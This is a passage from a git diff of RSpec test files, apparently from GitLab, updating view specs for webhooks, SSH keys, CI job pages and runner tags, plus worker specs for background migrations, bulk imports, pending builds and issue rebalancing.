'layouts/header/_new_dropdown' do allow(view).to receive(:can?).with(user, :create_projects, group).and_return(true) allow(view).to receive(:can?).with(user, :admin_group_member, group).and_return(invite_member) allow(view).to receive(:can_admin_project_member?).and_return(invite_member) - allow(view).to receive(:experiment_enabled?) 
end subject do diff --git a/spec/views/profiles/keys/_form.html.haml_spec.rb b/spec/views/profiles/keys/_form.html.haml_spec.rb index 0f4d7ecc699..d5a605958dc 100644 --- a/spec/views/profiles/keys/_form.html.haml_spec.rb +++ b/spec/views/profiles/keys/_form.html.haml_spec.rb @@ -33,8 +33,8 @@ RSpec.describe 'profiles/keys/_form.html.haml' do end it 'has the expires at field', :aggregate_failures do - expect(rendered).to have_field('Expires at', type: 'date') - expect(page.find_field('Expires at')['min']).to eq(l(1.day.from_now, format: "%Y-%m-%d")) + expect(rendered).to have_field('Expiration date', type: 'date') + expect(page.find_field('Expiration date')['min']).to eq(l(1.day.from_now, format: "%Y-%m-%d")) expect(rendered).to have_text('Key can still be used after expiration.') end diff --git a/spec/views/projects/buttons/_dropdown.html.haml_spec.rb b/spec/views/projects/buttons/_dropdown.html.haml_spec.rb deleted file mode 100644 index fc9d7c3ea91..00000000000 --- a/spec/views/projects/buttons/_dropdown.html.haml_spec.rb +++ /dev/null @@ -1,42 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe 'projects/buttons/_dropdown' do - let(:user) { create(:user) } - - context 'user with all abilities' do - before do - assign(:project, project) - - allow(view).to receive(:current_user).and_return(user) - allow(view).to receive(:can?).with(user, :push_code, project).and_return(true) - allow(view).to receive(:can_collaborate_with_project?).and_return(true) - end - - context 'empty repository' do - let(:project) { create(:project, :empty_repo) } - - it 'has a link to create a new file' do - render - - expect(view).to render_template('projects/buttons/_dropdown') - expect(rendered).to have_link('New file') - end - - it 'does not have a link to create a new branch' do - render - - expect(view).to render_template('projects/buttons/_dropdown') - expect(rendered).not_to have_link('New branch') - end - - it 'does not have a link to create a new tag' 
do - render - - expect(view).to render_template('projects/buttons/_dropdown') - expect(rendered).not_to have_link('New tag') - end - end - end -end diff --git a/spec/views/projects/edit.html.haml_spec.rb b/spec/views/projects/edit.html.haml_spec.rb index 60f4c1664f7..8c96f286c79 100644 --- a/spec/views/projects/edit.html.haml_spec.rb +++ b/spec/views/projects/edit.html.haml_spec.rb @@ -92,6 +92,22 @@ RSpec.describe 'projects/edit' do end end + context 'squash template' do + it 'displays a placeholder if none is set' do + render + + expect(rendered).to have_field('project[squash_commit_template]', placeholder: '%{title}') + end + + it 'displays the user entered value' do + project.update!(squash_commit_template: '%{first_multiline_commit}') + + render + + expect(rendered).to have_field('project[squash_commit_template]', with: '%{first_multiline_commit}') + end + end + context 'forking' do before do assign(:project, project) diff --git a/spec/views/projects/hooks/edit.html.haml_spec.rb b/spec/views/projects/hooks/edit.html.haml_spec.rb new file mode 100644 index 00000000000..c4ec2149794 --- /dev/null +++ b/spec/views/projects/hooks/edit.html.haml_spec.rb @@ -0,0 +1,58 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe 'projects/hooks/edit' do + let(:hook) { create(:project_hook, project: project) } + + let_it_be_with_refind(:project) { create(:project) } + + before do + assign :project, project + assign :hook, hook + end + + it 'renders webhook page with "Recent events"' do + render + + expect(rendered).to have_css('h4', text: _('Webhook')) + expect(rendered).to have_text(_('Recent events')) + end + + context 'webhook is rate limited' do + before do + allow(hook).to receive(:rate_limited?).and_return(true) + end + + it 'renders alert' do + render + + expect(rendered).to have_text(s_('Webhooks|Webhook was automatically disabled')) + end + end + + context 'webhook is permanently disabled' do + before do + allow(hook).to 
receive(:permanently_disabled?).and_return(true) + end + + it 'renders alert' do + render + + expect(rendered).to have_text(s_('Webhooks|Webhook failed to connect')) + end + end + + context 'webhook is temporarily disabled' do + before do + allow(hook).to receive(:temporarily_disabled?).and_return(true) + allow(hook).to receive(:disabled_until).and_return(Time.now + 10.minutes) + end + + it 'renders alert' do + render + + expect(rendered).to have_text(s_('Webhooks|Webhook fails to connect')) + end + end +end diff --git a/spec/views/projects/hooks/index.html.haml_spec.rb b/spec/views/projects/hooks/index.html.haml_spec.rb new file mode 100644 index 00000000000..0cdc3bcecb2 --- /dev/null +++ b/spec/views/projects/hooks/index.html.haml_spec.rb @@ -0,0 +1,62 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe 'projects/hooks/index' do + let(:existing_hook) { create(:project_hook, project: project) } + let(:new_hook) { ProjectHook.new } + + let_it_be_with_refind(:project) { create(:project) } + + before do + assign :project, project + assign :hooks, [existing_hook] + assign :hook, new_hook + end + + it 'renders webhooks page with "Project Hooks"' do + render + + expect(rendered).to have_css('h4', text: _('Webhooks')) + expect(rendered).to have_text('Project Hooks') + expect(rendered).not_to have_css('.gl-badge', text: _('Disabled')) + expect(rendered).not_to have_css('.gl-badge', text: s_('Webhooks|Failed to connect')) + expect(rendered).not_to have_css('.gl-badge', text: s_('Webhooks|Fails to connect')) + end + + context 'webhook is rate limited' do + before do + allow(existing_hook).to receive(:rate_limited?).and_return(true) + end + + it 'renders "Disabled" badge' do + render + + expect(rendered).to have_css('.gl-badge', text: _('Disabled')) + end + end + + context 'webhook is permanently disabled' do + before do + allow(existing_hook).to receive(:permanently_disabled?).and_return(true) + end + + it 'renders "Failed to connect" badge' do + 
render + + expect(rendered).to have_css('.gl-badge', text: s_('Webhooks|Failed to connect')) + end + end + + context 'webhook is temporarily disabled' do + before do + allow(existing_hook).to receive(:temporarily_disabled?).and_return(true) + end + + it 'renders "Fails to connect" badge' do + render + + expect(rendered).to have_css('.gl-badge', text: s_('Webhooks|Fails to connect')) + end + end +end diff --git a/spec/views/projects/jobs/show.html.haml_spec.rb b/spec/views/projects/jobs/show.html.haml_spec.rb index 83a00135629..8242d20a9e7 100644 --- a/spec/views/projects/jobs/show.html.haml_spec.rb +++ b/spec/views/projects/jobs/show.html.haml_spec.rb @@ -13,26 +13,47 @@ RSpec.describe 'projects/jobs/show' do end before do - assign(:build, build.present) assign(:project, project) assign(:builds, builds) allow(view).to receive(:can?).and_return(true) end - context 'when job is running' do - let(:build) { create(:ci_build, :trace_live, :running, pipeline: pipeline) } - + context 'when showing a CI build' do before do + assign(:build, build.present) render end - it 'does not show retry button' do - expect(rendered).not_to have_link('Retry') + it 'shows job vue app' do + expect(rendered).to have_css('#js-job-page') + expect(rendered).not_to have_css('#js-bridge-page') + end + + context 'when job is running' do + let(:build) { create(:ci_build, :trace_live, :running, pipeline: pipeline) } + + it 'does not show retry button' do + expect(rendered).not_to have_link('Retry') + end + + it 'does not show New issue button' do + expect(rendered).not_to have_link('New issue') + end + end + end + + context 'when showing a bridge job' do + let(:bridge) { create(:ci_bridge, status: :pending) } + + before do + assign(:build, bridge) + render end - it 'does not show New issue button' do - expect(rendered).not_to have_link('New issue') + it 'shows bridge vue app' do + expect(rendered).to have_css('#js-bridge-page') + expect(rendered).not_to have_css('#js-job-page') end end end diff 
--git a/spec/views/shared/runners/_runner_details.html.haml_spec.rb b/spec/views/shared/runners/_runner_details.html.haml_spec.rb index f9f93c8160b..cdf5ec563d0 100644 --- a/spec/views/shared/runners/_runner_details.html.haml_spec.rb +++ b/spec/views/shared/runners/_runner_details.html.haml_spec.rb @@ -113,14 +113,14 @@ RSpec.describe 'shared/runners/_runner_details.html.haml' do describe 'Tags value' do context 'when runner does not have tags' do it { is_expected.to have_content('Tags') } - it { is_expected.not_to have_selector('span.badge.badge-primary')} + it { is_expected.not_to have_selector('span.gl-badge.badge.badge-info')} end context 'when runner have tags' do let(:runner) { create(:ci_runner, tag_list: %w(tag2 tag3 tag1)) } it { is_expected.to have_content('Tags tag1 tag2 tag3') } - it { is_expected.to have_selector('span.badge.badge-primary')} + it { is_expected.to have_selector('span.gl-badge.badge.badge-info')} end end diff --git a/spec/views/shared/ssh_keys/_key_details.html.haml_spec.rb b/spec/views/shared/ssh_keys/_key_details.html.haml_spec.rb index 400319a42b7..1bee9f7463f 100644 --- a/spec/views/shared/ssh_keys/_key_details.html.haml_spec.rb +++ b/spec/views/shared/ssh_keys/_key_details.html.haml_spec.rb @@ -4,7 +4,7 @@ require 'spec_helper' RSpec.describe 'shared/ssh_keys/_key_delete.html.haml' do context 'when the text parameter is used' do it 'has text' do - render 'shared/ssh_keys/key_delete.html.haml', text: 'Button', html_class: '', button_data: '' + render partial: 'shared/ssh_keys/key_delete', formats: :html, locals: { text: 'Button', html_class: '', button_data: '' } expect(rendered).to have_button('Button') end @@ -12,7 +12,7 @@ RSpec.describe 'shared/ssh_keys/_key_delete.html.haml' do context 'when the text parameter is not used' do it 'does not have text' do - render 'shared/ssh_keys/key_delete.html.haml', html_class: '', button_data: '' + render partial: 'shared/ssh_keys/key_delete', formats: :html, locals: { html_class: '', 
button_data: '' } expect(rendered).to have_button('Delete') end diff --git a/spec/workers/background_migration_worker_spec.rb b/spec/workers/background_migration_worker_spec.rb index 7892eb89e80..4297e55ca6c 100644 --- a/spec/workers/background_migration_worker_spec.rb +++ b/spec/workers/background_migration_worker_spec.rb @@ -3,148 +3,5 @@ require 'spec_helper' RSpec.describe BackgroundMigrationWorker, :clean_gitlab_redis_shared_state do - let(:worker) { described_class.new } - - describe '.minimum_interval' do - it 'returns 2 minutes' do - expect(described_class.minimum_interval).to eq(2.minutes.to_i) - end - end - - describe '#perform' do - before do - allow(worker).to receive(:jid).and_return(1) - allow(worker).to receive(:always_perform?).and_return(false) - end - - it 'can run scheduled job and retried job concurrently' do - expect(Gitlab::BackgroundMigration) - .to receive(:perform) - .with('Foo', [10, 20]) - .exactly(2).time - - worker.perform('Foo', [10, 20]) - worker.perform('Foo', [10, 20], described_class::MAX_LEASE_ATTEMPTS - 1) - end - - context 'when lease can be obtained' do - before do - expect(Gitlab::BackgroundMigration) - .to receive(:perform) - .with('Foo', [10, 20]) - end - - it 'performs a background migration' do - worker.perform('Foo', [10, 20]) - end - - context 'when lease_attempts is 1' do - it 'performs a background migration' do - worker.perform('Foo', [10, 20], 1) - end - end - end - - context 'when lease not obtained (migration of same class was performed recently)' do - before do - expect(Gitlab::BackgroundMigration).not_to receive(:perform) - - worker.lease_for('Foo', false).try_obtain - end - - it 'reschedules the migration and decrements the lease_attempts' do - expect(described_class) - .to receive(:perform_in) - .with(a_kind_of(Numeric), 'Foo', [10, 20], 4) - - worker.perform('Foo', [10, 20], 5) - end - - context 'when lease_attempts is 1' do - before do - worker.lease_for('Foo', true).try_obtain - end - - it 'reschedules the 
migration and decrements the lease_attempts' do - expect(described_class) - .to receive(:perform_in) - .with(a_kind_of(Numeric), 'Foo', [10, 20], 0) - - worker.perform('Foo', [10, 20], 1) - end - end - - context 'when lease_attempts is 0' do - before do - worker.lease_for('Foo', true).try_obtain - end - - it 'gives up performing the migration' do - expect(described_class).not_to receive(:perform_in) - expect(Sidekiq.logger).to receive(:warn).with( - class: 'Foo', - message: 'Job could not get an exclusive lease after several tries. Giving up.', - job_id: 1) - - worker.perform('Foo', [10, 20], 0) - end - end - end - - context 'when database is not healthy' do - before do - allow(worker).to receive(:healthy_database?).and_return(false) - end - - it 'reschedules a migration if the database is not healthy' do - expect(described_class) - .to receive(:perform_in) - .with(a_kind_of(Numeric), 'Foo', [10, 20], 4) - - worker.perform('Foo', [10, 20]) - end - - context 'when lease_attempts is 0' do - it 'gives up performing the migration' do - expect(described_class).not_to receive(:perform_in) - expect(Sidekiq.logger).to receive(:warn).with( - class: 'Foo', - message: 'Database was unhealthy after several tries. Giving up.', - job_id: 1) - - worker.perform('Foo', [10, 20], 0) - end - end - end - - it 'sets the class that will be executed as the caller_id' do - expect(Gitlab::BackgroundMigration).to receive(:perform) do - expect(Gitlab::ApplicationContext.current).to include('meta.caller_id' => 'Foo') - end - - worker.perform('Foo', [10, 20]) - end - end - - describe '#healthy_database?' do - context 'when replication lag is too great' do - it 'returns false' do - allow(Postgresql::ReplicationSlot) - .to receive(:lag_too_great?) - .and_return(true) - - expect(worker.healthy_database?).to eq(false) - end - - context 'when replication lag is small enough' do - it 'returns true' do - allow(Postgresql::ReplicationSlot) - .to receive(:lag_too_great?) 
- .and_return(false) - - expect(worker.healthy_database?).to eq(true) - end - end - end - end + it_behaves_like 'it runs background migration jobs', 'main', :background_migration_database_health_reschedules end diff --git a/spec/workers/build_hooks_worker_spec.rb b/spec/workers/build_hooks_worker_spec.rb index 5f7e7e5fb00..a69e188b441 100644 --- a/spec/workers/build_hooks_worker_spec.rb +++ b/spec/workers/build_hooks_worker_spec.rb @@ -23,14 +23,6 @@ RSpec.describe BuildHooksWorker do end end - describe '.perform_async' do - it 'delays scheduling a job by calling perform_in with default delay' do - expect(described_class).to receive(:perform_in).with(ApplicationWorker::DEFAULT_DELAY_INTERVAL.second, 123) - - described_class.perform_async(123) - end - end - it_behaves_like 'worker with data consistency', described_class, data_consistency: :delayed diff --git a/spec/workers/bulk_imports/entity_worker_spec.rb b/spec/workers/bulk_imports/entity_worker_spec.rb index deae15a3ca2..ce45299c7f7 100644 --- a/spec/workers/bulk_imports/entity_worker_spec.rb +++ b/spec/workers/bulk_imports/entity_worker_spec.rb @@ -14,96 +14,118 @@ RSpec.describe BulkImports::EntityWorker do ) end - it 'enqueues the first stage pipelines work' do - expect_next_instance_of(Gitlab::Import::Logger) do |logger| - expect(logger) - .to receive(:info) - .with( - worker: described_class.name, - entity_id: entity.id, - current_stage: nil - ) - end + let(:job_args) { entity.id } - expect(BulkImports::PipelineWorker) - .to receive(:perform_async) - .with( - pipeline_tracker.id, - pipeline_tracker.stage, - entity.id - ) + it 'updates pipeline trackers to enqueued state when selected' do + worker = BulkImports::EntityWorker.new - subject.perform(entity.id) - end + next_tracker = worker.send(:next_pipeline_trackers_for, entity.id).first - it 'do not enqueue a new pipeline job if the current stage still running' do - expect(BulkImports::PipelineWorker) - .not_to receive(:perform_async) + next_tracker.reload - 
subject.perform(entity.id, 0) - end - - it 'enqueues the next stage pipelines when the current stage is finished' do - next_stage_pipeline_tracker = create( - :bulk_import_tracker, - entity: entity, - pipeline_name: 'Stage1::Pipeline', - stage: 1 - ) + expect(next_tracker.enqueued?).to be_truthy - pipeline_tracker.fail_op! + expect(worker.send(:next_pipeline_trackers_for, entity.id)) + .not_to include(next_tracker) + end - expect_next_instance_of(Gitlab::Import::Logger) do |logger| - expect(logger) - .to receive(:info) + include_examples 'an idempotent worker' do + it 'enqueues the first stage pipelines work' do + expect_next_instance_of(Gitlab::Import::Logger) do |logger| + # the worker runs twice but only executes once + expect(logger) + .to receive(:info).twice + .with( + worker: described_class.name, + entity_id: entity.id, + current_stage: nil + ) + end + + expect(BulkImports::PipelineWorker) + .to receive(:perform_async) .with( - worker: described_class.name, - entity_id: entity.id, - current_stage: 0 + pipeline_tracker.id, + pipeline_tracker.stage, + entity.id ) + + subject end - expect(BulkImports::PipelineWorker) - .to receive(:perform_async) - .with( - next_stage_pipeline_tracker.id, - next_stage_pipeline_tracker.stage, - entity.id - ) + it 'logs and tracks the raised exceptions' do + exception = StandardError.new('Error!') + + expect(BulkImports::PipelineWorker) + .to receive(:perform_async) + .and_raise(exception) + + expect_next_instance_of(Gitlab::Import::Logger) do |logger| + expect(logger) + .to receive(:info).twice + .with( + worker: described_class.name, + entity_id: entity.id, + current_stage: nil + ) + + expect(logger) + .to receive(:error) + .with( + worker: described_class.name, + entity_id: entity.id, + current_stage: nil, + error_message: 'Error!' 
+ ) + end + + expect(Gitlab::ErrorTracking) + .to receive(:track_exception) + .with(exception, entity_id: entity.id) + + subject + end - subject.perform(entity.id, 0) - end + context 'in first stage' do + let(:job_args) { [entity.id, 0] } - it 'logs and tracks the raised exceptions' do - exception = StandardError.new('Error!') + it 'do not enqueue a new pipeline job if the current stage still running' do + expect(BulkImports::PipelineWorker) + .not_to receive(:perform_async) - expect(BulkImports::PipelineWorker) - .to receive(:perform_async) - .and_raise(exception) + subject + end - expect_next_instance_of(Gitlab::Import::Logger) do |logger| - expect(logger) - .to receive(:info) - .with( - worker: described_class.name, - entity_id: entity.id, - current_stage: nil + it 'enqueues the next stage pipelines when the current stage is finished' do + next_stage_pipeline_tracker = create( + :bulk_import_tracker, + entity: entity, + pipeline_name: 'Stage1::Pipeline', + stage: 1 ) - expect(logger) - .to receive(:error) - .with( - worker: described_class.name, - entity_id: entity.id, - current_stage: nil, - error_message: 'Error!' - ) + pipeline_tracker.fail_op! 
+ + expect_next_instance_of(Gitlab::Import::Logger) do |logger| + expect(logger) + .to receive(:info).twice + .with( + worker: described_class.name, + entity_id: entity.id, + current_stage: 0 + ) + end + + expect(BulkImports::PipelineWorker) + .to receive(:perform_async) + .with( + next_stage_pipeline_tracker.id, + next_stage_pipeline_tracker.stage, + entity.id + ) + + subject + end end - - expect(Gitlab::ErrorTracking) - .to receive(:track_exception) - .with(exception, entity_id: entity.id) - - subject.perform(entity.id) end end diff --git a/spec/workers/bulk_imports/pipeline_worker_spec.rb b/spec/workers/bulk_imports/pipeline_worker_spec.rb index c902d1f2034..2da9195a6ef 100644 --- a/spec/workers/bulk_imports/pipeline_worker_spec.rb +++ b/spec/workers/bulk_imports/pipeline_worker_spec.rb @@ -60,18 +60,8 @@ RSpec.describe BulkImports::PipelineWorker do create( :bulk_import_tracker, entity: entity, - pipeline_name: 'FakePipeline' - ) - end - end - - it_behaves_like 'successfully runs the pipeline' do - let(:pipeline_tracker) do - create( - :bulk_import_tracker, - :started, - entity: entity, - pipeline_name: 'FakePipeline' + pipeline_name: 'FakePipeline', + status_event: 'enqueue' ) end end @@ -109,7 +99,8 @@ RSpec.describe BulkImports::PipelineWorker do pipeline_tracker = create( :bulk_import_tracker, entity: entity, - pipeline_name: 'InexistentPipeline' + pipeline_name: 'InexistentPipeline', + status_event: 'enqueue' ) expect_next_instance_of(Gitlab::Import::Logger) do |logger| @@ -150,7 +141,8 @@ RSpec.describe BulkImports::PipelineWorker do pipeline_tracker = create( :bulk_import_tracker, entity: entity, - pipeline_name: 'FakePipeline' + pipeline_name: 'FakePipeline', + status_event: 'enqueue' ) exception = BulkImports::NetworkError.new( @@ -163,7 +155,21 @@ RSpec.describe BulkImports::PipelineWorker do .and_raise(exception) end - expect(subject).to receive(:jid).and_return('jid') + expect(subject).to receive(:jid).and_return('jid').twice + + 
expect_any_instance_of(BulkImports::Tracker) do |tracker| + expect(tracker).to receive(:retry).and_call_original + end + + expect_next_instance_of(Gitlab::Import::Logger) do |logger| + expect(logger) + .to receive(:info) + .with( + worker: described_class.name, + pipeline_name: 'FakePipeline', + entity_id: entity.id + ) + end expect(described_class) .to receive(:perform_in) @@ -175,6 +181,10 @@ RSpec.describe BulkImports::PipelineWorker do ) subject.perform(pipeline_tracker.id, pipeline_tracker.stage, entity.id) + + pipeline_tracker.reload + + expect(pipeline_tracker.enqueued?).to be_truthy end end end @@ -200,7 +210,8 @@ RSpec.describe BulkImports::PipelineWorker do create( :bulk_import_tracker, entity: entity, - pipeline_name: 'NdjsonPipeline' + pipeline_name: 'NdjsonPipeline', + status_event: 'enqueue' ) end diff --git a/spec/workers/ci/pending_builds/update_group_worker_spec.rb b/spec/workers/ci/pending_builds/update_group_worker_spec.rb new file mode 100644 index 00000000000..8c6bf018158 --- /dev/null +++ b/spec/workers/ci/pending_builds/update_group_worker_spec.rb @@ -0,0 +1,40 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Ci::PendingBuilds::UpdateGroupWorker do + describe '#perform' do + let(:worker) { described_class.new } + + context 'when a group is not provided' do + it 'does not call the service' do + expect(::Ci::UpdatePendingBuildService).not_to receive(:new) + end + end + + context 'when everything is ok' do + let(:group) { create(:group) } + let(:update_pending_build_service) { instance_double(::Ci::UpdatePendingBuildService) } + let(:update_params) { { "namespace_id" => group.id } } + + it 'calls the service' do + expect(::Ci::UpdatePendingBuildService).to receive(:new).with(group, update_params).and_return(update_pending_build_service) + expect(update_pending_build_service).to receive(:execute) + + worker.perform(group.id, update_params) + end + + include_examples 'an idempotent worker' do + let(:pending_build) { 
create(:ci_pending_build) } + let(:update_params) { { "namespace_id" => pending_build.namespace_id } } + let(:job_args) { [pending_build.namespace_id, update_params] } + + it 'updates the pending builds' do + subject + + expect(pending_build.reload.namespace_id).to eq(update_params["namespace_id"]) + end + end + end + end +end diff --git a/spec/workers/ci/pending_builds/update_project_worker_spec.rb b/spec/workers/ci/pending_builds/update_project_worker_spec.rb new file mode 100644 index 00000000000..4a67127564e --- /dev/null +++ b/spec/workers/ci/pending_builds/update_project_worker_spec.rb @@ -0,0 +1,40 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Ci::PendingBuilds::UpdateProjectWorker do + describe '#perform' do + let(:worker) { described_class.new } + + context 'when a project is not provided' do + it 'does not call the service' do + expect(::Ci::UpdatePendingBuildService).not_to receive(:new) + end + end + + context 'when everything is ok' do + let(:project) { create(:project) } + let(:group) { create(:group) } + let(:update_pending_build_service) { instance_double(::Ci::UpdatePendingBuildService) } + let(:update_params) { { "namespace_id" => group.id } } + + it 'calls the service' do + expect(::Ci::UpdatePendingBuildService).to receive(:new).with(project, update_params).and_return(update_pending_build_service) + expect(update_pending_build_service).to receive(:execute) + + worker.perform(project.id, update_params) + end + + include_examples 'an idempotent worker' do + let(:pending_build) { create(:ci_pending_build) } + let(:job_args) { [pending_build.project_id, update_params] } + + it 'updates the pending builds' do + subject + + expect(pending_build.reload.namespace_id).to eq(update_params["namespace_id"]) + end + end + end + end +end diff --git a/spec/workers/concerns/application_worker_spec.rb b/spec/workers/concerns/application_worker_spec.rb index fbf39b3c7cd..7608b5f49a1 100644 --- 
a/spec/workers/concerns/application_worker_spec.rb +++ b/spec/workers/concerns/application_worker_spec.rb @@ -248,39 +248,40 @@ RSpec.describe ApplicationWorker do end describe '.perform_async' do - before do - stub_const(worker.name, worker) - end - - shared_examples_for 'worker utilizes load balancing capabilities' do |data_consistency| - before do - worker.data_consistency(data_consistency) - end - - it 'call perform_in' do - expect(worker).to receive(:perform_in).with(described_class::DEFAULT_DELAY_INTERVAL.seconds, 123) + using RSpec::Parameterized::TableSyntax - worker.perform_async(123) - end + where(:primary_only?, :skip_scheduling_ff, :data_consistency, :schedules_job?) do + true | false | :sticky | false + true | false | :delayed | false + true | false | :always | false + true | true | :sticky | false + true | true | :delayed | false + true | true | :always | false + false | false | :sticky | true + false | false | :delayed | true + false | false | :always | false + false | true | :sticky | false + false | true | :delayed | false + false | true | :always | false end - context 'when workers data consistency is :sticky' do - it_behaves_like 'worker utilizes load balancing capabilities', :sticky - end + before do + stub_const(worker.name, worker) + worker.data_consistency(data_consistency) - context 'when workers data consistency is :delayed' do - it_behaves_like 'worker utilizes load balancing capabilities', :delayed + allow(Gitlab::Database::LoadBalancing).to receive(:primary_only?).and_return(primary_only?) + stub_feature_flags(skip_scheduling_workers_for_replicas: skip_scheduling_ff) end - context 'when workers data consistency is :always' do - before do - worker.data_consistency(:always) - end - - it 'does not call perform_in' do - expect(worker).not_to receive(:perform_in) + with_them do + it 'schedules or enqueues the job correctly' do + if schedules_job? 
+ expect(worker).to receive(:perform_in).with(described_class::DEFAULT_DELAY_INTERVAL.seconds, 123) + else + expect(worker).not_to receive(:perform_in) + end - worker.perform_async + worker.perform_async(123) end end end diff --git a/spec/workers/create_commit_signature_worker_spec.rb b/spec/workers/create_commit_signature_worker_spec.rb index d283ff5b732..0e31faf47af 100644 --- a/spec/workers/create_commit_signature_worker_spec.rb +++ b/spec/workers/create_commit_signature_worker_spec.rb @@ -143,7 +143,7 @@ RSpec.describe CreateCommitSignatureWorker do let(:type) { :X509 } it 'performs a single query for commit signatures' do - expect(X509CommitSignature).to receive(:by_commit_sha).with(commit_shas).once.and_return([]) + expect(CommitSignatures::X509CommitSignature).to receive(:by_commit_sha).with(commit_shas).once.and_return([]) subject end @@ -153,7 +153,7 @@ RSpec.describe CreateCommitSignatureWorker do let(:type) { :PGP } it 'performs a single query for commit signatures' do - expect(GpgSignature).to receive(:by_commit_sha).with(commit_shas).once.and_return([]) + expect(CommitSignatures::GpgSignature).to receive(:by_commit_sha).with(commit_shas).once.and_return([]) subject end diff --git a/spec/workers/every_sidekiq_worker_spec.rb b/spec/workers/every_sidekiq_worker_spec.rb index d00243672f9..00b6d2635a5 100644 --- a/spec/workers/every_sidekiq_worker_spec.rb +++ b/spec/workers/every_sidekiq_worker_spec.rb @@ -398,7 +398,6 @@ RSpec.describe 'Every Sidekiq worker' do 'PropagateIntegrationInheritWorker' => 3, 'PropagateIntegrationProjectWorker' => 3, 'PropagateIntegrationWorker' => 3, - 'PropagateServiceTemplateWorker' => 3, 'PurgeDependencyProxyCacheWorker' => 3, 'ReactiveCachingWorker' => 3, 'RebaseWorker' => 3, diff --git a/spec/workers/issuable_export_csv_worker_spec.rb b/spec/workers/issuable_export_csv_worker_spec.rb index bcc2420996d..a18d10ad3df 100644 --- a/spec/workers/issuable_export_csv_worker_spec.rb +++ 
b/spec/workers/issuable_export_csv_worker_spec.rb @@ -35,10 +35,15 @@ RSpec.describe IssuableExportCsvWorker do end context 'with params' do - let(:params) { { 'test_key' => true } } + let(:params) { { 'test_key' => true, 'not' => { 'label_name' => ['SomeLabel'] } } } - it 'converts controller string keys to symbol keys for IssuesFinder' do - expect(IssuesFinder).to receive(:new).with(user, hash_including(test_key: true)).and_call_original + it 'allows symbol access for IssuesFinder' do + expect(IssuesFinder).to receive(:new).and_wrap_original do |method, user, params| + expect(params[:test_key]).to eq(true) + expect(params[:not][:label_name]).to eq(['SomeLabel']) + + method.call(user, params) + end subject end diff --git a/spec/workers/issue_placement_worker_spec.rb b/spec/workers/issue_placement_worker_spec.rb index 50b9d58a5b0..9b5121d98e8 100644 --- a/spec/workers/issue_placement_worker_spec.rb +++ b/spec/workers/issue_placement_worker_spec.rb @@ -35,7 +35,7 @@ RSpec.describe IssuePlacementWorker do it 'schedules rebalancing if needed' do issue_a.update!(relative_position: RelativePositioning::MAX_POSITION) - expect(IssueRebalancingWorker).to receive(:perform_async).with(nil, nil, project.group.id) + expect(Issues::RebalancingWorker).to receive(:perform_async).with(nil, nil, project.group.id) run_worker end @@ -52,7 +52,7 @@ RSpec.describe IssuePlacementWorker do .with(have_attributes(count: described_class::QUERY_LIMIT)) .and_call_original - expect(described_class).to receive(:perform_async).with(nil, project.id) + expect(Issues::PlacementWorker).to receive(:perform_async).with(nil, project.id) run_worker @@ -101,7 +101,7 @@ RSpec.describe IssuePlacementWorker do it 'anticipates the failure to place the issues, and schedules rebalancing' do allow(Issue).to receive(:move_nulls_to_end) { raise RelativePositioning::NoSpaceLeft } - expect(IssueRebalancingWorker).to receive(:perform_async).with(nil, nil, project.group.id) + expect(Issues::RebalancingWorker).to 
receive(:perform_async).with(nil, nil, project.group.id) expect(Gitlab::ErrorTracking) .to receive(:log_exception) .with(RelativePositioning::NoSpaceLeft, worker_arguments) diff --git a/spec/workers/issues/placement_worker_spec.rb b/spec/workers/issues/placement_worker_spec.rb index 694cdd2ef37..33fa0b31b72 100644 --- a/spec/workers/issues/placement_worker_spec.rb +++ b/spec/workers/issues/placement_worker_spec.rb @@ -35,7 +35,7 @@ RSpec.describe Issues::PlacementWorker do it 'schedules rebalancing if needed' do issue_a.update!(relative_position: RelativePositioning::MAX_POSITION) - expect(IssueRebalancingWorker).to receive(:perform_async).with(nil, nil, project.group.id) + expect(Issues::RebalancingWorker).to receive(:perform_async).with(nil, nil, project.group.id) run_worker end diff --git a/spec/workers/issues/rebalancing_worker_spec.rb b/spec/workers/issues/rebalancing_worker_spec.rb index 438edd85f66..e1c0b348a4f 100644 --- a/spec/workers/issues/rebalancing_worker_spec.rb +++ b/spec/workers/issues/rebalancing_worker_spec.rb @@ -35,6 +35,20 @@ RSpec.describe Issues::RebalancingWorker do described_class.new.perform # all arguments are nil end + + it 'does not schedule a new rebalance if it finished under 1h ago' do + container_type = arguments.second.present? ? 
::Gitlab::Issues::Rebalancing::State::PROJECT : ::Gitlab::Issues::Rebalancing::State::NAMESPACE + container_id = arguments.second || arguments.third + + Gitlab::Redis::SharedState.with do |redis| + redis.set(::Gitlab::Issues::Rebalancing::State.send(:recently_finished_key, container_type, container_id), true) + end + + expect(Issues::RelativePositionRebalancingService).not_to receive(:new) + expect(Gitlab::ErrorTracking).not_to receive(:log_exception) + + described_class.new.perform(*arguments) + end end shared_examples 'safely handles non-existent ids' do diff --git a/spec/workers/issues/reschedule_stuck_issue_rebalances_worker_spec.rb b/spec/workers/issues/reschedule_stuck_issue_rebalances_worker_spec.rb index 02d1241d2ba..6723c425f34 100644 --- a/spec/workers/issues/reschedule_stuck_issue_rebalances_worker_spec.rb +++ b/spec/workers/issues/reschedule_stuck_issue_rebalances_worker_spec.rb @@ -10,15 +10,15 @@ RSpec.describe Issues::RescheduleStuckIssueRebalancesWorker, :clean_gitlab_redis describe '#perform' do it 'does not schedule a rebalance' do - expect(IssueRebalancingWorker).not_to receive(:perform_async) + expect(Issues::RebalancingWorker).not_to receive(:perform_async) worker.perform end it 'schedules a rebalance in case there are any rebalances started' do expect(::Gitlab::Issues::Rebalancing::State).to receive(:fetch_rebalancing_groups_and_projects).and_return([[group.id], [project.id]]) - expect(IssueRebalancingWorker).to receive(:bulk_perform_async).with([[nil, nil, group.id]]).once - expect(IssueRebalancingWorker).to receive(:bulk_perform_async).with([[nil, project.id, nil]]).once + expect(Issues::RebalancingWorker).to receive(:bulk_perform_async).with([[nil, nil, group.id]]).once + expect(Issues::RebalancingWorker).to receive(:bulk_perform_async).with([[nil, project.id, nil]]).once worker.perform end diff --git a/spec/workers/loose_foreign_keys/cleanup_worker_spec.rb b/spec/workers/loose_foreign_keys/cleanup_worker_spec.rb index 
